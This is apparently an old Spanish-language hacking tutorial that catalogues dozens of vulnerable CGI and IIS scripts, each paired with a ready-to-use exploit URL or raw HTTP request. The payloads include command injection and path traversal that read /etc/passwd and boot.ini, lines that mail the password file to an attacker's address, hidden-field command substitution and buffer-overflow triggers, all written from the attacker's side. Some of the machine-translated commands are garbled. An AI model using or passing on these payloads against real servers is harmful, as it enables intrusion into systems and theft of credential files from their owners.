Este tutorial te mostrará muchos Cgi-Bin
un intro que son los exploits
http://neworder.box.sk/newsread.php?newsid=1351
-<>-
PHF:
Una secuencia de comandos que venían de serie con el popular servidor web Apache también contiene un grave defecto. Hay parámetro incorrectos , por lo tanto, cualquier comando que desea puede ser ejecutado en el sistema.
Exploit:
http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
muestra los password del servidor.
-<>-
Test-Cgi
Cualquier persona puede remotamente los archivos en una máquina.
Exploit:
http://www.thesite.com/cgi-bin/test-cgi?*
muestra el contenido del servidor Cgi directory.
/cgi-bin/test-cgi?/*
mostrará el contenido del directorio de servidores raíz.
CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, REMOTE_HOST field.
Tambien se puede utilizar con telnet en puerto 80
GET /cgi-bin/test-cgi?x> /*
-<>-
Fax Survey
Si se instala el paquete de HylaFAX (común en algunas personas mayores distribuciones de Linux), puede enviar comandos arbitrarios ejecutando como el UID del servidor web:
Exploit:
http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
muestra los password del servidor
-<>-
Netauth
Netauth es una red basada Sistema de gestión de correo electrónico para Windows NT y la mayoría de plataformas UNIX. Este producto contiene un agujero de seguridad que permite a los usuarios remotos descargar archivos locales, incluidos los archivos como / etc / shadow.
Exploit:
http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
muestra los password del servidor.
-<>-
Calender.pl
La vulnerabilidad permite a usuarios remotos ejecutar comandos arbitrarios en el servidor web con los privilegios del proceso httpd process.
El script calender_admin.pl solicita al usuario un archivo de configuración para modificarlo y a continuación en un intento de autenticar al usuario, lo pasa a la entrada del usuario directamente a perl open (). Esto puede ser fácilmente explotada para ejecutar código arbitrario de forma remota.
Exploit:
http://www.thesite.com/cgi-bin/calender_admin.pl
Ir a la URL que se traducirá en un nombre de username/password/configuration de los campos de entrada ignore el nombre de usuario y contraseña, introduzca:
ejemplo:
|ping 127.0.0.1|
y el comando se ejecutara.
-<>-
HTML script
HTML script tiene una vulnerabilidad en el mismo que le permite acceder a archivos del sistema, presumiblemente cualquier fichero que el usuario del servidor web puede acceder.
Exploit:
http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd
La URL anterior se recibe el archivo de contraseñas del servidor.
-<>-
Finger
- <> --
Finger
Obtenga una lista de direcciones de correo electrónico que encuentra en el lugar (vamos a suponer uno de ellos es "kangaroo@acme.net", y que su dirección de correo electrónico es "your@email.org")
Ir a la Finger Box, y en este tipo (cambia las direcciones de correo electrónico por unas reales):
kangaroo@acme.net; /bin/mail your@email.org < etc/password
Si esto funciona usted tiene el archivo etc / contraseña en su buzón de correo.
-<>-
classifieds.cgi
Anuncios es una script Cgi libre para el manejo de los anuncios clasificados. Existen múltiples agujeros de seguridad en el que permitir la ejecución remota. En primer lugar, mediante el establecimiento de su dirección de correo electrónico como algo así como "duke@viper.net.au </ etc / contraseña, puede leer archivos de forma remota del servidor.
Además, mediante el establecimiento de las variables ocultas en un formulario html, un usuario remoto puede obligar a comandos arbitrarios a ser ejecutados. Un ejemplo de ello es la modificación de las siguientes variables:
><input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
Cambiar su valor a otro comando hará que el comando alternativo para ser ejecutado.
-<>-
WebGais
WebGais es una interfaz a la herramienta de búsqueda GAIS. Se instala algunos programas en / cgi-bin. La utilidad principal se llama "WebGais" y que la interconexión real con la herramienta de búsqueda.
Se lee la consulta de un formulario de usuario, y luego ejecuta el motor de búsqueda GAIS para esa consulta. El autor trató de proteger el programa utilizando comillas simples alrededor de la consulta cuando se la pasó a un sistema de "comando". Pero se olvidó de un algo muy importante: para quitar las comillas simples de la consulta .
Exploit:
Telnet Target.machine.com 80
/Cgi-bin/webgais POST HTTP/1.0 Content-Length: 85 (sustituir esto con la longitud real de la "explotar" en línea)
query = '; + correo drazvan@pop3.kappa.ro </ etc / passwd; echo' & = salida de Estudiantes de dominio = párrafo
-<>-
Web Sendmail
Websendmail es un cgi-bin que viene con el paquete WebGais, que es una interfaz a la herramienta de búsqueda GAIS. Se trata de un script PERL que lee la entrada de un formulario y lo envía por e-mail al destino especificado.
Exploit:
Telnet Target.machine.com 80
POST / HTTP/1.0 cgi-bin/websendmail
Content-Length: xxx (debería ser reemplazado con la longitud real de la
Cadena que se pasa al servidor, en este caso xxx = 90)
= receptor; + correo your_address@somewhere.org </ etc / passwd; & sender = a & rtnaddr = a & subject = a & contenido = a
-<>-
Aglimpse
Glimpse HTTP es una interfaz a la herramienta de búsqueda Glimpse, escrito en Perl. Un agujero puede permitir la ejecución de cualquier comando en el sistema remoto.
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/aglimpse/80IFS=5; CMD = 5mail5thegnome@nmrc.org <mailto:thegnome@nmrc.org> passwd; eval $ CMD
- <> --
Webcom's Guestbook CGI vulnerability
Webcom's Guestbook CGI vulnerability para los servidores de Windows NT Web sufre de graves problemas de seguridad que permiten a los usuarios a distancia para ver los archivos de sistema local.
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename (para recibir archivos importantes del sistema)
- <> --
Webdist.cgi
Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Root or nobody).
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/webdist.cgi
- <> --
Wrap
Este exploit le permite a cualquiera obtener una lista para cualquier directorio con el mode +755
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/wrap
- <> --
PHP.cgi
Un fallo de seguridad que permite a un atacante leer archivos arbitrarios con los privilegios del demonio HTTP (Usually root or nobody)..
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/php.cgi
- <> --
Perl.exe
Este exploit nos permite ejecutar código Perl arbitrario en un PC, a distancia, por supuesto.
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/perl.exe
- <> --
NPH-test-cgi
Un fallo de seguridad que permite que obtiene la lista de los / directorio cgi-bin, descubriendo así que cgis están instalados en la máquina remota.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/NPH-test-cgi
- <> --
NPH-publish.cgi
Un fallo de seguridad que permite a un atacante ejecutar cualquier
los comandos con los privilegios del demonio HTTP.
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/nph-publish.cgi
- <> --
newdsn.exe
Este exploit le permite a cualquier atacante como nosotros la capacidad de crear archivos en cualquier lugar en su sistema si los permisos NTFS no son lo suficientemente estrictos, y se puede utilizar para sobrescribir los DSN de las bases de datos existentes
Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe
- <> --
JJ
Un fallo de seguridad que permite a un atacante ejecutar cualquier
de los comandos con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/jj
- <> --
info2www
Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Por lo general la raíz o nadie).
Ejemplo Exploit: http://www.thesite.com/cgi-bin/info2www
- <> --
Add-password.cgi
Ejemplo Exploit: http://www.thesite.com/cgi-bin/add-password.cgi
- <> --
imagemap.exe
Esta aplicación CGI es vulnerable a un desbordamiento de búfer que permitiría a un usuario remoto. poder ejecutar comandos arbitrarios con los privilegios de los administradores del servidor httpd. (O bien nadie o raíz)
Ejemplo Exploit: http://www.thesite.com/cgi-bin/imagemap.exe
- <> --
dumpenv.pl
Esta vulnerabilidad se da un montón de información sobre la configuración del servidor web
Ejemplo Exploit: http://www.thesite.com/cgi-bin/dumpenv
- <> --
guestbook.pl
Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.pl
- <> --
LibroDeInvitados.cgi
Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.cgi
- <> --
Campas
Un exploit que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/campas
- <> --
scripts
Si el directorio / scripts es navegable (probablemente si no se sabe nada de seguridad), entonces esto nos daría información valiosa sobre scripts que tienen instalado por defecto y también si hay alguna scripts actual, que pueden ser vulnerables
Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts
- <> --
loadpage.cgi
Este exploit viene con el paquete del 3,0 EZShopper. Podemos abrir los subdirectorios y / o ver algunos contenidos de archivos sensibles, como los archivos de datos de usuario.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=/
- <> --
search.cgi
Un error que nos permite ejecutar comandos en el servidor y ver archivos fuera de la ruta de acceso web.
http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1
- <> --
CGI Counter
La popular página web de la versión CGI acceso al CGI counter version 4.0.7 por George Burgyan permite la ejecución de comandos arbitrarios, debido a la entrada del usuarios. Los comandos se ejecutan con los mismos privilegios que el servidor web, pero otras vulnerabilidades se pueden utilizar para tener acceso de root en un sistema operativo actualizados.
Exploit:
Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f =; eco; w; uname% 20-A; ID
(Esto mostrará el nombre de usuario de un sistema dado)
Al pasar los comandos en una variable:
$ Telnet www.example.com www
GET / cgi-bin/counterfiglet/nc/f =;% sh 20-C% 20 "$ HTTP_X" HTTP/1.0
X: pwd; ls-la / etc; cat / etc / password
$ Telnet www.example.com www
GET / cgi-bin/counter/nl/ord/lang = Inglés (1); sistema ( "$ ENV (HTTP_X)"); HTTP/1.0
X: eco; id; uname-a; w
- <> --
SGI Infosearch
El subsistema de búsqueda de información se utiliza para buscar y navegar casi todos los SIG en la documentación en línea. Una vulnerabilidad ha sido descubierta en Infosearch.Cgi que podría permitir a cualquier usuario remoto para ver los archivos en el sistema vulnerable con los privilegios del usuario "nobody".
- <> --
Poll It
Poll It permite un fácil alojamiento de encuestas en línea en sitios web. Sin embargo, esta CGI también permite a atacantes remotos para leer cualquier archivo legible del mundo en el servidor.
Exploit:
http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd 00%
La URL anterior sería recuperar el archivo de contraseñas del servidor.
- <> --
Robpoll
Robpoll es un programa basado en Cgi libre de administración.
Exploit:
Primero ir a:
http://www.thesite.com/cgi-bin/robpoll.cgi?Admin
Usted tendrá la opción de cambiar la contraseña. La contraseña por defecto es "Robpoll", dejando esta contraseña tanto, compromete el sistema y sus archivos.
- <> --
Webbanner
Un agujero de seguridad en el CGI webbanner permite a atacantes remotos para ver determinados archivos en el sistema, y posiblemente ejecutar comandos del sistema, así.
Exploit:
http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd
La URL indicada anteriormente recuperar el archivo de contraseñas del servidor.
- <> --
WebWho +
WebWho + es un scblockedript Cgi libre para la ejecución de consultas whois a través de la www. A pesar de que lleva a cabo los controles de los caracteres de escape de Shell en algunos parámetros, se pierde la variable «type» y permite la entrada maliciosos para ser enviados a shell. Es posible ejecutar código arbitrario en un servidor web corriendo WebWho + v1.1 con el ID de usuario del servidor web.
- <> --
FormMail.pl
Una falla grave en el programa CGI popular Formmail.pl permite spammers para enviar mensajes anónimos
Exploit Ejemplo:
http://www.thesite.com/cgi-bin/formmail.pl
- <> --
alibaba.pl
Este exploit permitirá tener un listado de directorio de todos los archivos en el directorio CGI. Esto podría ser utilizado para encontrar los archivos. Pwl y para encontrar más directorios y scripts a explotar.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/alibaba.pl|dir
- <> --
input.bat
Este exploit le permiten ejecutar comandos arbitrarios
Ejemplo Exploit: http://www.thesite.com/cgi-bin/input.bat?|dir....windows
- <> --
bigconf.cgi
Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/bigconf.cgi
- <> --
- <> --
tst.bat
Esta falla en tst.bat nos permitiría leer archivos arbitrarios en un sistema remoto
Ejemplo Exploit: http://www.thesite.com/cgi-bin/tst.bat
- <> --
Idq.dll
Este exploit nos permitiría leer archivos arbitrarios en un sistema remoto
Ejemplo Exploit: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext
- <> --
FormHandler.cgi
La utilidad FormHandler CGI puede permitirnos descargar cualquier archivo de los sistemas vulnerables.
Ejemplo Exploit: http://www.thesite.com/formhandler.cgi
- <> --
Showcode.asp
Una muestra de Active Server Page (ASP) script instalado por defecto en Microsoft Internet Information Server (IIS) 4.0 nos daría acceso para ver cualquier archivo en el mismo volumen que el servidor web que sea legible por el servidor web.
Ejemplo Exploit: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp
- <> --
CodeBrws.asp
Este exploit nos permitiría ver la fuente de cualquier archivo en la raíz web con las extensiones. Asp. Inc. Htm o. Html
Ejemplo Exploit: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp
- <> --
htimage.exe
Existe un desbordamiento de búfer en el htimage.exe remoto cuando se da la siguiente petición:
Ejemplo Exploit: http://www.thesite.com/cgi-bin/htimage.exe/AAAA [....] AAA? 0,0
- <> --
wguest.exe
La solicitud de http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini devolverá el boot.ini web remota los servidores de archivos
Ejemplo Exploit: http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini
- <> --
uploader.exe
Un fallo de seguridad que le permite cargar cualquier Cgi arbitrario en el servidor, y luego ejecutarlos.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/uploader.exe
- <> --
search97.vts
Este exploit se puede utilizar para ver de forma remota cualquier archivo en un servidor web.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/search97.vts
- <> --
rguest.exe
Este exploit volverá con los $ winnt $. Inf.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/rguest.exe?template=c:winntsystem32 $ winnt $. Inf
- <> --
pfdispaly.cgi
Este exploit nos permita ver los archivos en un sistema vulnerable con los privilegios del usuario
Si se explota, puede permitir a cualquier usuario ver los archivos en un sistema vulnerable con los privilegios del usuario.
Ejemplo Exploit: http / / www.thesite.com / cgi-bin / pfdisplay.cgi
- <> --
Man.sh
Esto permitiría aprovechar todo el que puede ejecutar Cgi navegador web a través de ti ejecutar comandos del sistema con el ID de usuario del servidor web y obtener la salida de ellos en una página web.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/man.sh
- <> --
/ scripts / issadmin / bdir.htr
El bdir.htr archivo es un archivo por defecto de IIS que nos puede dar una gran cantidad de información innecesaria sobre
un sistema de archivos.
http://www.thesite.com/scblockedripts/iisadmin/bdir.htr??c:
- <> --
Count.cgi
Un desbordamiento de búfer puede ser en el programa de Count.cgi, permitiendo a los usuarios http remotos ejecutar comandos arbitrarios en la máquina objetivo.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/Count.cgi
- <> --
CGImail.exe
Una brecha de seguridad que podemos usar para obtener acceso a los confidenciales
de datos o fomentan la escalada de nuestros privilegios.
Ejemplo Exploit: http://www.thesite.com/scblockedripts/CGImail.exe
- <> --
carbo.dll
Este exploit se puede utilizar para ver de forma remota cualquier archivo en su servidor web.
Ejemplo Exploit: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog
- <> --
args.bat
Un fallo de seguridad que permite a un atacante subir archivos arbitrarios en el servidor web remoto.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/args.bat
- <> --
AnyForm2
Este exploit puede ser utilizado por nosotros al correo electrónico la contraseña del servidor web el archivo de nuevo a nosotros.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/AnyForm2
- <> --
get32.exe
Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/get32.exe
- <> --
Ews
Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/ews
- <> --
exprcalc.cfm
Este exploit nos permitiría ver, eliminar y cualquier subida en un servidor ColdFusion Application Server
Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm
- <> --
ExAir
IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / advsearch.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.
Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/advsearch.asp
- <> --
ExAir
IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / Query.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.
Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/query.asp
- <> --
ExAir
IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / search.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.
Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/search.asp
- <> --
Altavista
Sería posible leer el contenido de los archivos en la máquina remota mediante el uso de la Altavista búsqueda en la intranet de servicios, y realizar la solicitud a continuación.
Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/query?mss =% 2e/config 2e%
- <> --
input2.bat
Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/input2.bat?|dir....windows
- <> --
envout.bat
Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.
Ejemplo Exploit: http://www.thesite.com/ssi/envout.bat
- <> --
/cd/.. /config/html/cnf_gi.htm
Es posible acceder a la configuración remota AxisStorpoint anfitrión con Este exploit
Ejemplo Exploit: http://www.thesite.com/cd/../config/html/cnf_gi.htm
- <> --
cachemgr.cgi
RedHat Linux 6.0 instala squid cache manager por defecto con permisos de acceso no restringido. Esta script podría ser utilizado para realizar un escaneo de puertos desde el Cgi-host machine.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/cachemgr.cgi
- <> --
Web raíz remoto
Es posible obtener la ubicación de un directorio de red virtual de un host mediante la emisión de la orden de abajo.
Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0
- <> --
CGI
Esta es una muy obvio sin explotar. Es el cgi-bin navegable? Suena estúpido, pero es que algunas personas son estúpidas. Recuerde que.
Ejemplo Exploit: http://www.thesite.com/Cgi-Bin
- <> --
cgitest.exe
Existe un desbordamiento de búfer en el cgitest.exe, que nos permitirá ejecutar comandos arbitrarios con los mismos privilegios que el servidor web (raíz o de nadie).
Ejemplo Exploit: http://www.thesite.com/cgi-bin/cgitest.exe
- <> --
ExprCalc.cfm
Para visualizar y borrar cualquier archivo en el sistema de uso de una dirección URL de la siguiente forma siguiente:
Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:thetargetfile
- <> --
getdrvrs.exe
Obtener los controladores desde el sitio.
Ejemplo Exploit: http://www.thesite.com/scblockedripts/tools/getdrvrs.exe
- <> --
bnbform.cgi
Los usuarios remotos pueden leer ficheros arbitrarios en el sistema de archivos.
Ejemplo Exploit: http://www.thesite.com/Cgi-Bin/bnbform.cgi
- <> --
survey.cgi
Los usuarios remotos pueden ejecutar comandos con privilegios del servidor web
Ejemplo Exploit: http://www.thesite.com/Cgi-bin/survey.cgi
- <> --
.htaccess
Cgi-host machine le permitiría leer archivos protegidos con. Htaccess
http://www.thegnome.com/secure/.htaccess
- <> --
convert.bas
Cgi-host machine le permitirá leer cualquier archivo en el sistema de archivos remoto.
Exploit Ejemplo:
http://thesite.com/scblockedripts/convert.bas?../anythingyouwanttoview
CREDITOS
BLACKACE227
NOTA: ME PODRIAN DECIR CUALES SON LOS QUE FALTAN Y QUE OTRAS PAGIANS ESPECIFICAN INFORMACION SOBRE MAS DETALLADA SOBRE ESTO ES PARA IR ACTUALIZANDOLO Y HACER UN MANUAL SUPERCOMPLETO SOBRE EL TEMA